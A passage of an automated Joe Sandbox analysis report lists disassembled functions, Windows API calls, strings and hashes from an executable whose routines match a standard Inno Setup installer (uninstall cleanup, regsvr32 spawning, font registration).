GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC

Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39

Strings

{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 004719F5
desktop.ini, xrefs: 004719D0
target.lnk, xrefs: 00471A11
.ShellClassInfo, xrefs: 004719EB
CLSID2, xrefs: 004719E6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C

Function 0045C9D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(03100000,inflateInit_), ref: 0045C9DD
GetProcAddress.KERNEL32(03100000,inflate), ref: 0045C9ED
GetProcAddress.KERNEL32(03100000,inflateEnd), ref: 0045C9FD
GetProcAddress.KERNEL32(03100000,inflateReset), ref: 0045CA0D

Strings

inflateReset, xrefs: 0045CA07
inflateEnd, xrefs: 0045C9F7
inflateInit_, xrefs: 0045C9D7
inflate, xrefs: 0045C9E7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C

Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041A9C9
73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
SetBkColor.GDI32(?,?), ref: 0041AA18
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
SetBkColor.GDI32(00000000,?), ref: 0041AAD3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68

Function 004572BC Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2

Strings

Spawning 32-bit RegSvr32: , xrefs: 00457369
/u, xrefs: 0045731E
regsvr32.exe", xrefs: 00457303
0x%x, xrefs: 00457405
/s ", xrefs: 0045732B
Spawning 64-bit RegSvr32: , xrefs: 00457347
D, xrefs: 00457398
CreateProcess, xrefs: 004573D4

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59

Function 0044C9CC Relevance: 13.6, APIs: 9, Instructions: 90COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
GetSysColor.USER32(00000014), ref: 0044CA04
SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
GetSysColor.USER32(00000010), ref: 0044CA56
SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669

Function 00494950 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34

Strings

Deleting Uninstall data files., xrefs: 00494957

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D

Function 0046F1E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
AddFontResourceA.GDI32(00000000), ref: 0046F27B
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F

Strings

AddFontResource, xrefs: 0046F299
Failed to set value in Fonts registry key., xrefs: 0046F250
Failed to open Fonts registry key., xrefs: 0046F265

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E

Function 00462558 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE

GetVersion.KERNEL32 ref: 00462588
SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
LoadCursorA.USER32(00000000,00007F02), ref: 00462601
SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A

Strings

Explorer, xrefs: 004625A2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE

Function 00476E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0), ref: 00476E74
CloseHandle.KERNEL32(00000000,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92

Strings

kernel32.dll, xrefs: 00476E2C
GetFinalPathNameByHandleA, xrefs: 00476E27

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E

Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
LocalFree.KERNEL32(00703FC8,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(?,00000000,00008000,00703FC8,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(00704FC8,?,00000000,00008000,00703FC8,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62

Strings

Up, xrefs: 00401B07

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: Up
API String ID: 3782394904-1945652401
Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF

Function 0045952C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2

Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5

Strings

Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
Failed to delete directory (%d). Will retry later., xrefs: 0045960B
Failed to delete directory (%d)., xrefs: 00459688
Stripped read-only attribute., xrefs: 004595B4
Deleting directory: %s, xrefs: 0045957B
Failed to strip read-only attribute., xrefs: 004595C0

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E

Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00422EB4
GetCapture.USER32 ref: 00422EC3
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
ReleaseCapture.USER32 ref: 00422ECE
GetActiveWindow.USER32 ref: 00422EDD
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
GetActiveWindow.USER32 ref: 00422FCF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D

Function 0042F104 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
GetWindowLongA.USER32(?,000000EC), ref: 0042F145
GetActiveWindow.USER32 ref: 0042F14E
MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ActiveLong$Message
String ID:
API String ID: 2785966331-0
Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68

Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000), ref: 0042949A
GetTextMetricsA.GDI32(00000000), ref: 004294A3

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 004294B2
GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
SelectObject.GDI32(00000000,00000000), ref: 004294C6
73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
GetSystemMetrics.USER32(00000006), ref: 004294F3
GetSystemMetrics.USER32(00000006), ref: 0042950D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
String ID:
API String ID: 361401722-0
Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A

Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
